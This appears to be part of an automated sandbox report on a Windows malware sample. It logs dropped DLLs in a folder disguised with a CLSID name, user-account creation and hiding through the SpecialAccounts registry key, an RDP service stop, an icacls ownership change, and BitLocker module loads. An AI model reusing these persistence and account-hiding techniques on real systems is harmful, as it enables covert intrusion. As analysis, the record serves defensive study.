Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

File written: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 5654528 > 1048576

Source: file.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x43c600

Source:	Binary string: RfxVmt.pdb source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr
Source:	Binary string: RfxVmt.pdbGCTL source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr

Source: rfxvmt.dll.24.dr

Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBAFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

6_2_00007FF66EBAFF1F

Source: file.exe	Static PE information: section name: .didata
Source: f8ff311483bvmdq2bvv.exe.1.dr	Static PE information: section name: .xdata
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe.1.dr	Static PE information: section name: .xdata
Source: main.exe.11.dr	Static PE information: section name: .xdata
Source: rdpctl.dll.24.dr	Static PE information: section name: .xdata
Source: samctl.dll.24.dr	Static PE information: section name: .xdata
Source: prgmgr.dll.24.dr	Static PE information: section name: .xdata
Source: dwlmgr.dll.24.dr	Static PE information: section name: .xdata
Source: cnccli.dll.24.dr	Static PE information: section name: .xdata
Source: libi2p.dll.24.dr	Static PE information: section name: .xdata
Source: evtsrv.dll.24.dr	Static PE information: section name: .xdata
Source: termsrv32.dll.24.dr	Static PE information: section name: .xdata
Source: m28TQ56q.24.dr	Static PE information: section name: .xdata
Source: OKh5fbg5.24.dr	Static PE information: section name: .xdata
Source: CheAuE4k.24.dr	Static PE information: section name: .xdata
Source: nVYOsq5a.24.dr	Static PE information: section name: .xdata
Source: o1i2PUnI.24.dr	Static PE information: section name: .xdata
Source: ZNdEbgqy.24.dr	Static PE information: section name: .xdata
Source: SCKoP3sQ.24.dr	Static PE information: section name: .xdata
Source: 459WBsWA.24.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B9120E pushfd ; retf	0_2_02B9120F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02BAF262 push es; retf	0_2_02BAF263
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B96769 push esi; ret	0_2_02B9676B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79CB push qword ptr [00007FFDDB5B789Ch]; retf	24_2_00007FFDA55B79D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79C3 push qword ptr [00007FFDDB5B7894h]; retf	24_2_00007FFDA55B79C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79D3 push qword ptr [00007FFDDB5B78A4h]; retf	24_2_00007FFDA55B79D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79BB push qword ptr [00007FFDDB5B788Ch]; retf	24_2_00007FFDA55B79C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79B3 push qword ptr [00007FFDDB5B7884h]; retf	24_2_00007FFDA55B79B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B7A07 push qword ptr [00007FFDDB5B78D8h]; retf	24_2_00007FFDA55B7A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79FF push qword ptr [00007FFDDB5B78D0h]; retf	24_2_00007FFDA55B7A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B7A17 push qword ptr [00007FFDAC5B78E8h]; retf	24_2_00007FFDA55B7A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B7A0F push qword ptr [00007FFDDB5B78E0h]; retf	24_2_00007FFDA55B7A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79E7 push qword ptr [00007FFDDB5B78B8h]; retf	24_2_00007FFDA55B79ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79F7 push qword ptr [00007FFDDB5B78C8h]; retf	24_2_00007FFDA55B79FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B79EF push qword ptr [00007FFDDB5B78C0h]; retf	24_2_00007FFDA55B79F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72CC push rsp; ret	24_2_00007FFDA55B72CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72C4 push rsp; ret	24_2_00007FFDA55B72C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72D8 push rsp; ret	24_2_00007FFDA55B72D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72DC push rsp; ret	24_2_00007FFDA55B72DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72D0 push rsp; ret	24_2_00007FFDA55B72D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72D4 push rsp; ret	24_2_00007FFDA55B72D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72B8 push rsp; ret	24_2_00007FFDA55B72B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72BC push rsp; ret	24_2_00007FFDA55B72BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B727C push rsp; ret	24_2_00007FFDA55B727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B726F push qword ptr [rsi]; ret	24_2_00007FFDA55B7275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72E8 push rsp; ret	24_2_00007FFDA55B72E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72E0 push rsp; ret	24_2_00007FFDA55B72E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55B72E4 push rsp; ret	24_2_00007FFDA55B72E5

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 24_2_00007FFDA557870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,

24_2_00007FFDA557870B

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\nVYOsq5a	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\459WBsWA	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\o1i2PUnI	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\LL369bff	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\OKh5fbg5	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\SCKoP3sQ	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ZNdEbgqy	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\CheAuE4k	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\m28TQ56q	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\nVYOsq5a	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\459WBsWA	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\o1i2PUnI	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\LL369bff	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\OKh5fbg5	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\SCKoP3sQ	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ZNdEbgqy	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\CheAuE4k	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\m28TQ56q	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\m28TQ56q	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\OKh5fbg5	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\CheAuE4k	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\nVYOsq5a	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\o1i2PUnI	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\ZNdEbgqy	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\SCKoP3sQ	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\459WBsWA	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\LL369bff	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 24_2_00007FF70CAD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

24_2_00007FF70CAD1DBC

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000022.00000002.3267547458.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000022.00000002.3267547458.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
